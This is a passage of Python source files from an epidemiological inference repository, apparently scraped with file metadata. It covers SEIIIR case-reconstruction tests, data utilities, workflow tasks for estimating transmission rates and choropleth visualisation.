\n # run the simulation\n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, N, report_delay, tx=tx)\n\n # reconstruct the states\n dfT = None\n dfS = None\n dfE = None\n dfI1 = None\n dfI2 = None\n dfI3 = None\n dfR = None\n np.random.seed(1975)\n for real in range(50):\n reported_cases_per_day = rcommon.reported_cases_from_cumulative(dates=sim.cumulative_reported_cases.dates,\n cumulative_reported_cases=sim.cumulative_reported_cases.values)\n\n recon = recons.stochastic_reconstruction(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values, \n population=N,\n n_steps_per_day=4,\n reporting_delay_mean=8,\n reporting_delay_dev=1.35,\n reporting_multiplier=reporting_factor,\n fixed_incubation=5.2,\n infectious_lower=2.6,\n infectious_upper=6.0)\n\n if dfT is None:\n dfT = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfS = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfE = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfI1 = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfI2 = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfI3 = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n dfR = pd.DataFrame({'dates': recon.dates}).set_index('dates')\n\n dfT['{}'.format(real)] = recon.transmissions\n dfS['{}'.format(real)] = recon.S\n dfE['{}'.format(real)] = recon.E\n dfI1['{}'.format(real)] = recon.I1\n dfI2['{}'.format(real)] = recon.I2\n dfI3['{}'.format(real)] = recon.I3\n dfR['{}'.format(real)] = recon.R\n\n dfsimT = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.transmissions}).set_index('dates')\n assert_if_mean_significantly_different(dfT, dfsimT, 4, 0.2)\n dfsimS = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.S}).set_index('dates')\n assert_if_mean_significantly_different(dfS, dfsimS, 4, 0.25)\n dfsimE = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.E}).set_index('dates')\n assert_if_mean_significantly_different(dfE, dfsimE, 4, 0.2)\n dfsimI1 = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.I1}).set_index('dates')\n assert_if_mean_significantly_different(dfI1, dfsimI1, 4, 0.2)\n dfsimI2 = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.I2}).set_index('dates')\n assert_if_mean_significantly_different(dfI2, dfsimI2, 4, 0.2)\n dfsimI3 = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.I3}).set_index('dates')\n assert_if_mean_significantly_different(dfI3, dfsimI3, 4, 0.2)\n dfsimR = pd.DataFrame({'dates':sim.SEIIIR.dates, 'sim':sim.SEIIIR.R}).set_index('dates')\n assert_if_mean_significantly_different(dfR, dfsimR, 4, 0.2)\n\n@pytest.mark.skip('Not updating numpy version for now')\ndef test_np_stochastic_reconstruction():\n # run a simulation and test that we reconstruct the states\n # from the cumulative reported cases\n N = 10000\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n reporting_factor = 10\n report_delay = 8\n tf=100\n tx=[0]*tf\n tx[10] = 1\n\n counties = np.asarray(['12001', '12002', '12003'], dtype=np.object)\n #counties = np.asarray(['12001'], dtype=np.object)\n populations = np.zeros(len(counties))\n cumulative_reported_cases = np.zeros((tf+1,len(counties)))\n simT = np.zeros((tf,len(counties)))\n simS = np.zeros((tf,len(counties)))\n simE = np.zeros((tf,len(counties)))\n simI1 = np.zeros((tf,len(counties)))\n simI2 = np.zeros((tf,len(counties)))\n simI3 = np.zeros((tf,len(counties)))\n simR = np.zeros((tf,len(counties)))\n for i,c in enumerate(counties):\n y0={'S': N*(i+1), 
'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n populations[i] = N*(i+1)\n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, populations[i], report_delay, tx=tx)\n cumulative_reported_cases[:,i] = sim.cumulative_reported_cases.values\n simT[:,i] = sim.SEIIIR.transmissions\n simS[:,i] = sim.SEIIIR.S\n simE[:,i] = sim.SEIIIR.E\n simI1[:,i] = sim.SEIIIR.I1\n simI2[:,i] = sim.SEIIIR.I2\n simI3[:,i] = sim.SEIIIR.I3\n simR[:,i] = sim.SEIIIR.R\n cumulative_reported_cases_dates = np.asarray(sim.cumulative_reported_cases.dates)\n dates = np.asarray(sim.SEIIIR.dates)\n\n # reconstruct the states\n np.random.seed(42)\n for real in range(100):\n reported_cases_per_day = rcommon.np_reported_cases_from_cumulative(dates=cumulative_reported_cases_dates,\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\n recon = recons.np_stochastic_reconstruction(dates=reported_cases_per_day.dates,\n counties=reported_cases_per_day.counties,\n reported_cases_per_day=reported_cases_per_day.values,\n populations=populations,\n n_steps_per_day=4)\n\n realization_df = _long_dataframe_from_recon(recon)\n realization_df['realization'] = real\n if real == 0:\n recon_df = realization_df\n else:\n recon_df = pd.concat([recon_df, realization_df])\n\n abstol=4\n dfsimS = pd.DataFrame(index=dates, columns=counties, data=simS)\n _special_tolerance_check(dfsimS, recon_df, 'S', abstol, 0.05)\n dfsimE = pd.DataFrame(index=dates, columns=counties, data=simE)\n _special_tolerance_check(dfsimE, recon_df, 'E', abstol, 0.15)\n dfsimI1 = pd.DataFrame(index=dates, columns=counties, data=simI1)\n _special_tolerance_check(dfsimI1, recon_df, 'I1', abstol, 0.2)\n dfsimI2 = pd.DataFrame(index=dates, columns=counties, data=simI2)\n _special_tolerance_check(dfsimI2, recon_df, 'I2', abstol, 0.2)\n dfsimI3 = pd.DataFrame(index=dates, columns=counties, data=simI3)\n _special_tolerance_check(dfsimI3, recon_df, 'I3', abstol, 0.2)\n dfsimR = pd.DataFrame(index=dates, columns=counties, data=simR)\n _special_tolerance_check(dfsimR, recon_df, 'R', abstol, 0.2)\n \ndef assert_if_mean_significantly_different(df1, df2, abstol, reltol):\n mean = df1.mean(axis=1)\n mean.name = 'mean'\n dferrors = df2.join(mean, how='inner')\n dferrors['errors'] = (dferrors['mean']-dferrors['sim']).abs()\n dferrors['relerrors'] = dferrors['errors'].divide((dferrors['sim']+1))\n # print(dferrors['relerrors'])\n dferrors['flag'] = dferrors['errors'].gt(abstol) & dferrors['relerrors'].gt(reltol)\n nerrs = dferrors['flag'].sum()\n if nerrs > 0:\n print(df1)\n print(df2)\n print(dferrors)\n assert nerrs == 0\n\ndef _special_tolerance_check(dfsim, recon_df, comp, abstol, reltol):\n dfsim.index.name = 'dates'\n mean = recon_df[recon_df['comp']==comp].groupby(['dates','county']).mean().reset_index().pivot(index='dates', columns='county', values='count')\n diff = (mean-dfsim).dropna(how='all')\n reldiff = diff.divide(dfsim[dfsim.index.isin(diff.index)])\n # print('...', comp)\n # print(diff)\n # print(reldiff)\n nerrs = (diff.gt(abstol) & reldiff.gt(reltol)).sum().sum()\n assert nerrs == 0\n\ndef _quantile_check(dfsim, recon_df, comp, counties, lowerq, upperq):\n dfsim.index.name = 'dates'\n # loop over all the counties\n for i,c in enumerate(counties):\n df = recon_df[recon_df['comp']==comp]\n df = df[df['county']==c]\n df = df.pivot(index='dates', columns='realization', values='count')\n lower = df.quantile(lowerq, axis=1)[df.index.isin(dfsim.index)]\n upper = df.quantile(upperq, axis=1)[df.index.isin(dfsim.index)]\n sim = 
dfsim[c]\n sim = sim[sim.index.isin(lower.index)]\n # print(lower)\n # print(sim)\n # print(upper)\n # print((lower.gt(sim) | sim.gt(upper)))\n nerrs = (lower.gt(sim) | sim.gt(upper)).sum()\n print('Checking compartment:', comp, ' for county: ', c)\n assert nerrs == 0\n\ndef _wide_dataframe_from_recon(recon):\n S = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.S)\n S['comp'] = 'S'\n E = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.E)\n E['comp'] = 'E'\n I1 = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.I1)\n I1['comp'] = 'I1'\n I2 = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.I2)\n I2['comp'] = 'I2'\n I3 = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.I3)\n I3['comp'] = 'I3'\n R = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.R)\n R['comp'] = 'R'\n return pd.concat([S, E, I1, I2, I3, R])\n\ndef _long_dataframe_from_recon(recon):\n df = None\n for i,c in enumerate(recon.counties):\n S = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.S[:,i])\n S.index.name = 'dates'\n S.reset_index(inplace=True)\n S['comp'] = 'S'\n S['county'] = c\n E = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.E[:,i])\n E.index.name = 'dates'\n E.reset_index(inplace=True)\n E['comp'] = 'E'\n E['county'] = c\n I1 = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.I1[:,i])\n I1.index.name = 'dates'\n I1.reset_index(inplace=True)\n I1['comp'] = 'I1'\n I1['county'] = c\n I2 = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.I2[:,i])\n I2.index.name = 'dates'\n I2.reset_index(inplace=True)\n I2['comp'] = 'I2'\n I2['county'] = c\n I3 = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.I3[:,i])\n I3.index.name = 'dates'\n I3.reset_index(inplace=True)\n I3['comp'] = 'I3'\n I3['county'] = c\n R = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.R[:,i])\n R.index.name = 'dates'\n R.reset_index(inplace=True)\n R['comp'] = 'R'\n R['county'] = c\n\n if df is None:\n df = pd.concat([S, E, I1, I2, I3, R])\n else:\n df = pd.concat([df, S, E, I1, I2, I3, R])\n return df\n" }, { "alpha_fraction": 0.5978639125823975, "alphanum_fraction": 0.6005961298942566, "avg_line_length": 31.200000762939453, "blob_id": "645d192e524b9155c05f54f819a1e69613abd6f5", "content_id": "e03568b2bd4279af1787667b9e58d24193d52d87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4026, "license_type": "no_license", "max_line_length": 130, "num_lines": 125, "path": "/epi_inference/util.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import os\nimport re\n#import itertools\n#from pyutilib.misc import Options\n#import string\nimport datetime\nimport json\nimport pandas as pd\nfrom recursive_diff import recursive_diff\nimport pprint\n\n\ndef roundall(*args):\n \"\"\"\n Pass in any number of lists as arguments, and this function\n will return new lists (in the same order) with all values\n rounded to integers\n \"\"\"\n ret_lists = list()\n for arg in args:\n assert type(arg) is list\n l = [None]*len(arg)\n for i,v in enumerate(arg):\n l[i] = round(v)\n ret_lists.append(l)\n return ret_lists\n\n\n#\n# NOTE: This assumes that it's safe to ignore the time when encoding a datetime object\n#\nclass ToStr_JSONEncoder(json.JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, datetime.datetime):\n return obj.__str__()\n elif isinstance(obj, datetime.date):\n return 
obj.__str__()\n #\n # Convert numpy int/float types\n #\n try:\n return int(obj)\n except:\n try:\n return float(obj)\n except:\n pass\n return json.JSONEncoder.default(self, obj)\n\n def _encode(self, obj):\n def transform_date(o):\n return self._encode(o.strftime(\"%Y-%m-%d\") if isinstance(o, datetime.datetime) or isinstance(o, datetime.date) else o)\n if isinstance(obj, dict):\n return {transform_date(k): transform_date(v) for k, v in obj.items()}\n elif isinstance(obj, list) or isinstance(obj, set):\n return [transform_date(l) for l in obj]\n else:\n return obj\n\n def encode(self, obj):\n return super(ToStr_JSONEncoder, self).encode(self._encode(obj))\n\n\ndef load_population(input_csv, index):\n try:\n population_df = pd.read_csv(input_csv, encoding=\"ISO-8859-1\", dtype={index:'str'})\n population_df = population_df.set_index(index)\n except: # pragma: no cover\n raise RuntimeError(\"ERROR reading file \"+input_csv)\n return population_df\n\n\ndef save_results(results, output):\n print(\"Writing results in file \"+output)\n filedir = os.path.dirname(output)\n if not os.path.exists(filedir):\n os.makedirs(filedir)\n with open(output,'w') as OUTPUT:\n json.dump(results, OUTPUT, cls=ToStr_JSONEncoder, indent=4)\n\n\ndef compare_csv(output, gold, index_col=None, check_exact=False, sort=True):\n if index_col is None:\n outputdf = pd.read_csv(output)\n golddf = pd.read_csv(gold)\n else:\n outputdf = pd.read_csv(output, index_col=index_col)\n golddf = pd.read_csv(gold, index_col=index_col)\n\n # the dataframes may be the same, but just in a different order\n if sort:\n columns = list(outputdf.columns)\n outputdf.sort_values(by=columns, inplace=True, ignore_index=True)\n golddf.sort_values(by=columns, inplace=True, ignore_index=True)\n pd.testing.assert_frame_equal(left=outputdf, right=golddf, check_exact=check_exact)\n return outputdf, golddf\n\n\ndef compare_json(output_file, baseline_file, abs_tol=1e-6, skip_keys=None): # pragma: no cover\n with open(output_file,'r') as INPUT:\n output = json.load(INPUT)\n with open(baseline_file,'r') as INPUT:\n baseline = json.load(INPUT)\n diffs = list(recursive_diff(baseline, output, abs_tol=abs_tol))\n\n # process the skip_keys if necessary\n if len(diffs) != 0 and skip_keys is not None:\n unskipped_diffs = list()\n for d in diffs:\n add = True\n for k in skip_keys:\n e = re.compile('.*: Pair {}:.*is in [RL]HS only'.format(k))\n if e.match(d):\n add = False\n break\n if add:\n unskipped_diffs.append(d)\n diffs = unskipped_diffs\n\n if len(diffs) != 0:\n print('DIFFERENCES IN JSON')\n pprint.pprint(diffs)\n assert(len(diffs) == 0)\n return output, baseline\n\n" }, { "alpha_fraction": 0.5989224910736084, "alphanum_fraction": 0.6040107607841492, "avg_line_length": 31.115385055541992, "blob_id": "6bb8de9d2ddcb246f01481659f99e5e6115e0b80", "content_id": "889ae6b3b0e04ae20b90b6f6f7117deea7883061", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3341, "license_type": "no_license", "max_line_length": 135, "num_lines": 104, "path": "/epi_inference/reconstruction/recon_summary_old_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['recon_summary']\n\nimport sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport csv\nimport glob\nimport numpy as np\nimport pandas as pd\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef 
summary_narrow(OUTPUT, reader, scenario_index):\n header = next(reader)\n offset = {header[i]:i for i in range(len(header))}\n #print(\"HEADER:\",header)\n if not scenario_index in header:\n raise RuntimeError(\"The scenario index is not specified in the CSV file: '%s'\" % scenario_index)\n header.remove('value')\n header.remove(scenario_index)\n #\n # Collect data from dataframe\n #\n timing.tic()\n data = {}\n for row in reader:\n key = tuple(row[offset[name]] for name in header)\n if key not in data:\n data[key] = []\n data[key].append( float(row[offset['value']]) )\n timing.toc(\". Collected data\")\n #\n # Create summary CSV\n #\n OUTPUT.write(\",\".join(header+['mean','Q25', 'Q50', 'Q75']))\n OUTPUT.write(\"\\n\")\n for key, vals in data.items():\n #print(key,vals)\n #mean = statistics.mean(vals)\n mean = np.mean(vals)\n #quartiles = statistics.quantiles(vals, method='inclusive')\n quartiles = np.quantile(vals, [0.25, 0.5, 0.75])\n \n results = (str(mean), str(quartiles[0]), str(quartiles[1]), str(quartiles[2]))\n OUTPUT.write(\",\".join(map(str,key + results)))\n OUTPUT.write(\"\\n\")\n timing.toc(\". Wrote summary\")\n\n\ndef recon_summary(input_csv, output_csv, scenario_index, csv_format=None):\n if not os.path.exists(input_csv):\n raise RuntimeError(\"ERROR: Reconstruction CSV file does not exist: \"+ input_csv)\n #\n #print(\"Processing reconstruction file: \"+input_csv)\n #with open(input_csv,'r') as INPUT:\n #df = pd.read_csv(INPUT)\n\n # Write CSV file\n print(\"Writing results summary: \"+output_csv)\n if csv_format == 'wide':\n #with open(full_outfile,'w') as OUTPUT:\n # write_wide(OUTPUT, raw, counties)\n pass\n elif csv_format == 'flatten':\n #with open(full_outfile,'w') as OUTPUT:\n # write_flattened(OUTPUT, full_infile, counties)\n pass\n else:\n with open(output_csv,'w') as OUTPUT:\n with open(input_csv,'r') as INPUT:\n reader = csv.reader(INPUT)\n summary_narrow(OUTPUT, reader, scenario_index)\n\n\nclass Recon_Summary_WorkflowOLD(Task):\n\n def __init__(self):\n Task.__init__(self, \"recon_summary_old\",\n \"Summarize a reconstruction CSV.\")\n\n def validate(self, CONFIG):\n valid_options = set(['format', 'scenario_index', 'input_csv', 'output_csv', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n recon_summary(\n CONFIG['input_csv'],\n output_csv=CONFIG['output_csv'],\n scenario_index=CONFIG['scenario_index'],\n csv_format=CONFIG.get('format','narrow'))\n\n\nregister_task(Recon_Summary_WorkflowOLD())\n\n" }, { "alpha_fraction": 0.6406030058860779, "alphanum_fraction": 0.655678391456604, "avg_line_length": 45.05555725097656, "blob_id": "1153b066ec341e4bcfd2a848ad3baeb70a74e729", "content_id": "f0182c16d156bd365c0be4001a7192c24a3922d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4975, "license_type": "no_license", "max_line_length": 152, "num_lines": 108, "path": "/epi_inference/formulations/attic/tests/bad_inference.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport pandas as pd\nimport shutil\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\nfrom epi_inference.engine import driver\n\n# collect yaml\n# dir, county, days_before_first, days_after_first, output\n\ndef 
compare_csv(output, gold, index_col, cols_to_compare=None, check_exact=False): # pragma: no cover\n if index_col is None:\n outputdf = pd.read_csv(output)\n golddf = pd.read_csv(gold)\n else:\n outputdf = pd.read_csv(output, index_col=index_col)\n golddf = pd.read_csv(gold, index_col=index_col)\n\n #print(outputdf)\n #print(golddf)\n\n if cols_to_compare is None:\n pd.testing.assert_frame_equal(left=outputdf, right=golddf, check_exact=check_exact)\n else:\n for c in cols_to_compare:\n pd.testing.assert_series_equal(left=outputdf[c], right=golddf[c], check_exact=check_exact)\n\n return outputdf, golddf\n\n\nclass TestInference():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n\n @pytest.mark.skip('inconsistencies in simulated data seems to be causing more cases than population')\n def test_inference_decay_lsq_filter(self):\n args = Options()\n args.config_file = './config_files/inference_decay_lsq_filter.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/results_expdata3_1_all.csv', './baseline/results_expdata3_1_all.csv', index_col=None)\n assert outputdf.shape[0] == 10\n outputdf, golddf = compare_csv('./output/results_expdata3_1_all_lastdays.csv', './baseline/results_expdata3_1_all_lastdays.csv', index_col=None)\n assert outputdf.shape[0] == 10\n \n # cleanup the files we created\n os.remove('./output/results_expdata3_1_all.csv')\n os.remove('./output/results_expdata3_1_all_meta.yml')\n os.remove('./output/results_expdata3_1_all_lastdays.csv')\n os.remove('./output/results_expdata3_1_all_lastdays_meta.yml')\n\n\n @pytest.mark.skip('inconsistencies in simulated data seems to be causing more cases than population')\n def test_inference_exp(self):\n args = Options()\n args.config_file = './config_files/inference_exp.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/results_expdata3_decay-lsq_all.csv', './baseline/results_expdata3_decay-lsq_all.csv', index_col=None)\n assert outputdf.shape[0] == 10\n outputdf, golddf = compare_csv('./output/results_expdata3_inference_all.csv', './baseline/results_expdata3_inference_all.csv', index_col=None)\n assert outputdf.shape[0] == 20\n \n # cleanup the files we created\n os.remove('./output/results_expdata3_decay-lsq_all.csv')\n os.remove('./output/results_expdata3_decay-lsq_all_meta.yml')\n os.remove('./output/results_expdata3_inference_all.csv')\n os.remove('./output/results_expdata3_inference_all_meta.yml')\n \n\n def test_inference_case(self):\n args = Options()\n args.config_file = './config_files/inference_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/results_countydata1_12121_decay-lsq_all.csv', './baseline/results_countydata1_12121_decay-lsq_all.csv',\n cols_to_compare=['est_beta', 'status', 'FIPS'], index_col=None)\n assert outputdf.shape[0] == 7\n outputdf, golddf = compare_csv('./output/results_county1_inference_all.csv', './baseline/results_county1_inference_all.csv',\n cols_to_compare=['est_beta', 'status', 'FIPS'], index_col=None)\n assert outputdf.shape[0] == 14\n outputdf, golddf = 
compare_csv('./output/results_countydata1_multinode_all.csv', './baseline/results_countydata1_multinode_all.csv',\n cols_to_compare=['est_beta', 'status'], index_col=None)\n assert outputdf.shape[0] == 1\n \n # cleanup the files we created\n os.remove('./output/results_countydata1_12121_decay-lsq_all.csv')\n os.remove('./output/results_countydata1_12121_decay-lsq_all_meta.yml')\n os.remove('./output/results_county1_inference_all.csv')\n os.remove('./output/results_county1_inference_all_meta.yml')\n os.remove('./output/results_countydata1_multinode_all.csv')\n os.remove('./output/results_countydata1_multinode_all_meta.yml')\n\n" }, { "alpha_fraction": 0.6724637746810913, "alphanum_fraction": 0.6724637746810913, "avg_line_length": 22, "blob_id": "10494c2801c3316dcc739d352965739c8a4abcfa", "content_id": "1a7c8d19acc81a895244ae84e1a29f16e7ced563", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 345, "license_type": "no_license", "max_line_length": 80, "num_lines": 15, "path": "/epi_inference/engine/task_registry.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['register_task', 'registered_tasks']\n\n#\n# mapping from TaskName -> Task object instance\n#\nglobal_tasks = {}\n\ndef register_task(task):\n if task.name in global_tasks:\n raise RuntimeError(\"Task '%s' has already been registered!\" % task.name)\n global_tasks[task.name] = task\n\n\ndef registered_tasks():\n return global_tasks\n" }, { "alpha_fraction": 0.6674015522003174, "alphanum_fraction": 0.6674015522003174, "avg_line_length": 38.185184478759766, "blob_id": "085d903f09a9e4549d1c93ac40e1dbd3a182c9b6", "content_id": "9d77f0598834c6ff44fd562b88db5bc57eac9808", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3175, "license_type": "no_license", "max_line_length": 212, "num_lines": 81, "path": "/epi_inference/formulations/inference_mobility_windows_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\ntry:\n import ujson as json\nexcept:\n import json\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..util import load_population, save_results\nfrom ..formulations.multinode_mobility_window_decay_lsq import run_multinode_mobility_window_decay_lsq\nfrom ..formulations.multinode_mobility_window_decay_lsq_old import run_multinode_mobility_window_decay_lsq_old\nfrom ..formulations.multinode_mobility_window_decay_lsq_poek import run_multinode_mobility_window_decay_lsq_poek\nfrom ..formulations.multinode_mobility_window_decay_lsq_iterative import run_multinode_mobility_window_decay_lsq_iterative\n\n\ndef run(CONFIG, warnings):\n #\n # Load the reconstruction data \n #\n with open(CONFIG['reconstruction_json'],'r') as INPUT:\n recon = json.load(INPUT)\n #\n # Load the mobility data \n #\n with open(CONFIG['mobility_json'],'r') as INPUT:\n mobility = json.load(INPUT)\n #\n # Perform inference\n #\n if True:\n #try:\n if CONFIG.get('version','new') == 'new':\n results = run_multinode_mobility_window_decay_lsq(recon=recon, mobility=mobility, analysis_window=CONFIG['analysis_window'], select_window=CONFIG.get('select_window', None), verbose=CONFIG['verbose'])\n elif CONFIG.get('version','new') == 'poek':\n results = run_multinode_mobility_window_decay_lsq_poek(recon=recon, mobility=mobility, 
analysis_window=CONFIG['analysis_window'], verbose=CONFIG['verbose'])\n elif CONFIG.get('version') == 'pyomo_old':\n results = run_multinode_mobility_window_decay_lsq_old(recon=recon, mobility=mobility, analysis_window=CONFIG['analysis_window'], verbose=CONFIG['verbose'])\n elif CONFIG.get('version') == 'pyomo_iterative':\n results = run_multinode_mobility_window_decay_lsq_iterative(\n recon=recon,\n mobility=mobility,\n analysis_window=CONFIG['analysis_window'],\n objective=CONFIG.get('objective', 'lsq'),\n select_window=CONFIG.get('select_window', None),\n verbose=CONFIG['verbose'])\n else:\n #except Exception as err:\n print(\"ERROR: Unexpected exception '%s'\" % str(err))\n results = {}\n warnings.append(str(err))\n #\n # Save results\n #\n save_results(results, CONFIG['output_json'])\n save_metadata(CONFIG, warnings)\n\n\nclass InferenceMobilityWindows(Task):\n\n def __init__(self):\n Task.__init__(self, \"estimate_beta_windows_with_mobility\",\n \"Estimate beta over different time windows using inter-county mobility information.\")\n\n def validate(self, args):\n valid_options = set(['reconstruction_json', 'mobility_json', 'output_json', 'version', 'analysis_window', 'select_window', 'verbose', 'factors', 'factor_levels', 'workflow', 'objective'])\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(InferenceMobilityWindows())\n\n" }, { "alpha_fraction": 0.6124401688575745, "alphanum_fraction": 0.612971842288971, "avg_line_length": 36.23762512207031, "blob_id": "48cc7ce4d38de3c025f2ca7c898528d6ce76c865", "content_id": "6e10b63da07cd2cc698d0c7fdf5ad3c6b8606e56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3762, "license_type": "no_license", "max_line_length": 150, "num_lines": 101, "path": "/epi_inference/viz/viz_choropleth_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_scenario', 'run_summary']\n\nimport os.path\nimport glob\nimport csv\ntry:\n import ujson as json\nexcept:\n import json\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..viz.choropleth import create_us_choropleth_scenario, create_us_choropleth_summary\n\n\ndef run_scenario(CONFIG, warnings):\n if not 'input_json' in CONFIG:\n print(\"No 'input_json' value specified\")\n warnings.append(\"No 'input_json' value specified\")\n elif not os.path.exists(CONFIG['input_json']):\n print(\"File %s does not exist\" % CONFIG['input_json'])\n warnings.append(\"File %s does not exist\" % CONFIG['input_json'])\n else:\n with open(CONFIG['input_json'], 'r') as INPUT:\n results_json = json.load(INPUT)\n create_us_choropleth_scenario(results_json=results_json,\n value_key='beta',\n output_html=CONFIG['output_html'],\n description=CONFIG.get('description','Choropleth Plot of Estimated COVID Transmission Rates'),\n show_browser=CONFIG.get('show_browser',None))\n\ndef run_summary(CONFIG, warnings):\n if not 'input_csv' in CONFIG:\n print(\"No 'input_csv' value specified\")\n warnings.append(\"No 'input_csv' value specified\")\n else:\n data = {}\n for filename in glob.glob(CONFIG['input_csv']):\n with open(filename, 'r') as INPUT:\n first = None\n last = None\n for row in csv.reader(INPUT):\n if first is None:\n first = row\n last = row\n FIPS = filename.split('.')[-2].split('_')[-1]\n # NOTE - If we allow the user to 
specify the date, then we need to keep all the rows...\n data[FIPS] = [{first[i]:last[i] for i in range(len(first))}]\n create_us_choropleth_summary(summary_csv=data,\n value_key='qmean_filtered_est_beta',\n output_html=CONFIG['output_html'],\n description=CONFIG.get('description','Choropleth Plot of Mean Values of Estimated COVID Transmission Rates'),\n show_browser=CONFIG.get('show_browser',None))\n\n\nclass Viz_ChoroplethScenario(Task):\n\n def __init__(self):\n Task.__init__(self, \"viz_choropleth_scenario\",\n \"Create visualization of a single set of estimated beta values.\")\n\n def validate(self, CONFIG):\n valid_options = set(['description', 'input_json', 'output_html', 'show_browser', 'verbose', 'output', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run_scenario(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nclass Viz_ChoroplethSummary(Task):\n\n def __init__(self):\n Task.__init__(self, \"viz_choropleth_summary\",\n \"Create visualization of a summary of estimated beta values over a set of scenarios.\")\n\n def validate(self, CONFIG):\n valid_options = set(['description', 'input_csv', 'output_html', 'show_browser', 'verbose', 'output', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run_summary(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(Viz_ChoroplethScenario())\nregister_task(Viz_ChoroplethSummary())\n\n" }, { "alpha_fraction": 0.6127817034721375, "alphanum_fraction": 0.6309092044830322, "avg_line_length": 41.75379943847656, "blob_id": "95fc380617be2cbbeaf1b7cabbcb9f2e2066c6d8", "content_id": "7d1abf00d0fde84d116b15f3c7d8c4c5f7f9d2fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14067, "license_type": "no_license", "max_line_length": 187, "num_lines": 329, "path": "/epi_inference/reconstruction/deterministic.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "from datetime import datetime, timedelta\nimport epi_inference.reconstruction.common as common\nimport numpy as np\nfrom pyutilib.misc.misc import Bunch\n\n\"\"\"\nThis module provides methods for simple reconstruction of the populations\nin the compartments from cumulative reported 